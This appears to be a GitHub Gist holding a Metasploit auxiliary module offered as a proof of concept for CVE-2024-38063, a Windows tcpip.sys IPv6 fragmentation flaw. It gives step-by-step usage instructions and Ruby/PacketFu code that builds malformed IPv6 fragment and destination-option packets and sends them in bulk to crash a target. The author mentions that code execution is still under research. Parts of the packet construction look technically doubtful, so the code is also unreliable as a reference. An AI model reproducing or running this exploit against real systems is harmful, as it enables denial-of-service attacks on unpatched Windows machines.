Last active
August 27, 2024 21:06
-
-
Save dmaynor/1b74d410881532abaecb567d65a0af09 to your computer and use it in GitHub Desktop.
CVE-2024-38063 IPV6 frag vuln PoC msf module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Howto | |
| Copy the below class to modules/auxillary/dos/ipv6 | |
| Then | |
| msfconsole | |
| use auxiliary/dos/ipv6/cve_2024_38063_packetfu | |
| set TARGET_IPV6 <target_ipv6_address> | |
| set NUM_PACKETS 1000 | |
| run | |
| Notes | |
| Ghidra bindiff ftw. This is a DoS, code execution is | |
| still being researched. | |
| require 'packetfu' | |
| class MetasploitModule < Msf::Auxiliary | |
| include Msf::Exploit::Remote::Udp | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'CVE-2024-38063 IPv6 Fragmentation Vulnerability with PacketFu', | |
| 'Description' => %q{ | |
| This module exploits a vulnerability in the Windows tcpip.sys driver by sending | |
| crafted IPv6 packets with malformed no options and fragmentation to trigger a memory corruption. | |
| }, | |
| 'Author' => ['David Maynor <dmaynor@sempervictus.com>'], | |
| 'License' => MSF_LICENSE, | |
| 'References' => [ | |
| ['CVE', '2024-38063'], | |
| ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063'] | |
| ], | |
| 'DisclosureDate' => '2024-08-13', | |
| 'DefaultOptions' => { | |
| 'RPORT' => 0 | |
| }, | |
| 'Actions' => [ ['Automatic', {}] ], | |
| 'PassiveOptions' => [ | |
| OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']), | |
| OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000]) | |
| ], | |
| 'Notes' => { | |
| 'Stability' => [ CRASH_SAFE ], | |
| 'SideEffects' => [ DOS ], | |
| 'Reliability' => [ REPEATABLE_SESSION ] | |
| } | |
| )) | |
| register_options( | |
| [ | |
| Opt::RPORT(0), | |
| OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']), | |
| OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000]) | |
| ] | |
| ) | |
| end | |
| def run | |
| num_packets = datastore['NUM_PACKETS'] | |
| target_ipv6 = datastore['TARGET_IPV6'] | |
| num_packets.times do |i| | |
| pkt = build_malicious_ipv6_packet(target_ipv6) | |
| PacketFu::Utils.sendpkt(pkt, iface: PacketFu::Utils.default_iface, verbose: true) | |
| print_status("Sent packet #{i + 1}/#{num_packets} to #{target_ipv6}") | |
| end | |
| end | |
| def build_malicious_ipv6_packet(ipv6_addr) | |
| config = PacketFu::Config.new(PacketFu::Utils.whoami?(:iface => PacketFu::Utils.default_iface)) | |
| eth = PacketFu::EthHeader.new(config: config) | |
| eth.eth_daddr = PacketFu::EthHeader.str2mac(PacketFu::Utils.arp(ipv6_addr, iface: PacketFu::Utils.default_iface)[:mac_saddr]) | |
| eth.eth_proto = 0x86DD # IPv6 | |
| ipv6 = PacketFu::IPHeader.new | |
| ipv6.ip_v = 6 | |
| ipv6.ip_dst = ipv6_addr | |
| ipv6.ip_proto = 44 # Fragment Header | |
| # Create fragment header and destination options header | |
| frag_header = PacketFu::IPv6Fragment.new | |
| frag_header.frag_id = rand(0x10000) | |
| frag_header.frag_mf = 1 | |
| frag_header.frag_offset = 0 | |
| dest_opts = PacketFu::IPv6DestOpts.new | |
| dest_opts.options = "\x81\x00\x00\x00" # Malformed Option | |
| pkt = eth + ipv6 + frag_header + dest_opts | |
| pkt.recalc | |
| pkt | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment